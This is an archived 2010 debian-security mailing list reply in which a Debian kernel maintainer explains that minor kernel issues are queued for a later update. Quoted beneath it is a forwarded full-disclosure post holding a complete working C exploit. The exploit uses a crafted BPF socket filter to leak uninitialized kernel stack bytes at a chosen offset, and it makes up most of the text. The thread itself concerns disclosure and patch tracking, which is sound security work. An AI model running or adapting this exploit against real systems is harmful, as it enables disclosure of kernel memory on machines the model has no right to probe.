Re: Fwd: Kernel 0-day

To: Cornichon <cornichonva@gmail.com>
Cc: debian-security@lists.debian.org
Subject: Re: Fwd: Kernel 0-day
From: dann frazier <dannf@debian.org>
Date: Thu, 11 Nov 2010 12:31:22 -0700
Message-id: <[🔎] 20101111193122.GF32613@dannf.org>
In-reply-to: <[🔎] AANLkTi=3Gi25VGRr9hd7yV83_e4C2KYOZYXOGG0y1AxD@mail.gmail.com>
References: <1289341127.7380.10.camel@dan> <[🔎] AANLkTi=3Gi25VGRr9hd7yV83_e4C2KYOZYXOGG0y1AxD@mail.gmail.com>

Dan and others have been finding several issues like this
lately. Debian is tracking them and we will include fixes in a future
kernel update. As this class of issue is relatively minor and
frequent, we don't push out a kernel update immedatiately each time
one pops up. Rather, we queue them until there is either a major issue
that warrants a fix, or enough minor issues to justify an update.

If its the subject line that got your attention, see:
  http://marc.info/?l=linux-netdev&m=128936689811877&w=2
  http://marc.info/?l=linux-netdev&m=128938757601104&w=2


On Thu, Nov 11, 2010 at 07:54:00PM +0100, Cornichon wrote:
> any feedback about this?
> cheers
> 
> 
> ---------- Forwarded message ----------
> From: Dan Rosenberg <dan.j.rosenberg@gmail.com>
> Date: 2010/11/9
> Subject: Kernel 0-day
> To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
> 
> Enjoy...
> -Dan
> 
> /*
>  * You've done it.  After hours of gdb and caffeine, you've finally got a
> shell
>  * on your target's server.  Maybe next time they will think twice about
>  * running MyFirstCompSciProjectFTPD on a production machine.  As you take
>  * another sip of Mountain Dew and pick some of the cheetos out of your
> beard,
>  * you begin to plan your next move - it's time to tackle the kernel.
>  *
>  * What should be your goal?  Privilege escalation?  That's impossible,
> there's
>  * no such thing as a privilege escalation vulnerability on Linux.  Denial
> of
>  * service?  What are you, some kind of script kiddie?  No, the answer is
>  * obvious.  You must read the uninitialized bytes of the kernel stack,
> since
>  * these bytes contain all the secrets of the universe and the meaning of
> life.
>  *
>  * How can you accomplish this insidious feat?  You immediately discard the
>  * notion of looking for uninitialized struct members that are copied back
> to
>  * userspace, since you clearly need something far more elite.  In order to
>  * prove your superiority, your exploit must be as sophisticated as your
> taste
>  * in obscure electronic music.  After scanning the kernel source for good
>  * candidates, you find your target and begin to code...
>  *
>  * by Dan Rosenberg
>  *
>  * Greets to kees, taviso, jono, spender, hawkes, and bla
>  *
>  */
> 
> #include <string.h>
> #include <stdio.h>
> #include <netinet/in.h>
> #include <sys/socket.h>
> #include <unistd.h>
> #include <stdlib.h>
> #include <linux/filter.h>
> 
> #define PORT 37337
> 
> int transfer(int sendsock, int recvsock)
> {
> 
>        struct sockaddr_in addr;
>        char buf[512];
>        int len = sizeof(addr);
> 
>        memset(buf, 0, sizeof(buf));
> 
>        if (fork())
>                return recvfrom(recvsock, buf, 512, 0, (struct sockaddr
> *)&addr, &len);
> 
>        sleep(1);
> 
>        memset(&addr, 0, sizeof(addr));
>        addr.sin_family = AF_INET;
>        addr.sin_port = htons(PORT);
>        addr.sin_addr.s_addr = inet_addr("127.0.0.1");
> 
>        sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
> 
>        exit(0);
> 
> }
> 
> int main(int argc, char * argv[])
> {
> 
>        int sendsock, recvsock, ret;
>        unsigned int val;
>        struct sockaddr_in addr;
>        struct sock_fprog fprog;
>        struct sock_filter filters[5];
> 
>        if (argc != 2) {
>                printf("[*] Usage: %s offset (0-63)\n", argv[0]);
>                return -1;
>        }
> 
>        val = atoi(argv[1]);
> 
>        if (val > 63) {
>                printf("[*] Invalid byte offset (must be 0-63)\n");
>                return -1;
>        }
> 
>        recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
>        sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
> 
>        if (recvsock < 0 || sendsock < 0) {
>                printf("[*] Could not create sockets.\n");
>                return -1;
>        }
> 
>        memset(&addr, 0, sizeof(addr));
>        addr.sin_family = AF_INET;
>        addr.sin_port = htons(PORT);
>        addr.sin_addr.s_addr = htonl(INADDR_ANY);
> 
>        if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
>                printf("[*] Could not bind socket.\n");
>                return -1;
>        }
> 
>        memset(&fprog, 0, sizeof(fprog));
>        memset(filters, 0, sizeof(filters));
> 
>        filters[0].code = BPF_LD|BPF_MEM;
>        filters[0].k = (val & ~0x3) / 4;
> 
>        filters[1].code = BPF_ALU|BPF_AND|BPF_K;
>        filters[1].k = 0xff << ((val % 4) * 8);
> 
>        filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
>        filters[2].k = (val % 4) * 8;
> 
>        filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
>        filters[3].k = 256;
> 
>        filters[4].code = BPF_RET|BPF_A;
> 
>        fprog.len = 5;
>        fprog.filter = filters;
> 
>        if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog,
> sizeof(fprog)) < 0) {
>                printf("[*] Failed to install filter.\n");
>                return -1;
>        }
> 
>        ret = transfer(sendsock, recvsock);
> 
>        printf("[*] Your byte: 0x%.02x\n", ret - 248);
> 
> }

Reply to:

References:
- Fwd: Kernel 0-day
  - From: Cornichon <cornichonva@gmail.com>

Prev by Date: Fwd: Kernel 0-day
Next by Date: Re: CVE-2009-3555 not addressed in OpenSSL
Previous by thread: Fwd: Kernel 0-day
Next by thread: Re: [SECURITY] [DSA 2038-3] New pidgin packages fix regression
Index(es):
- Date
- Thread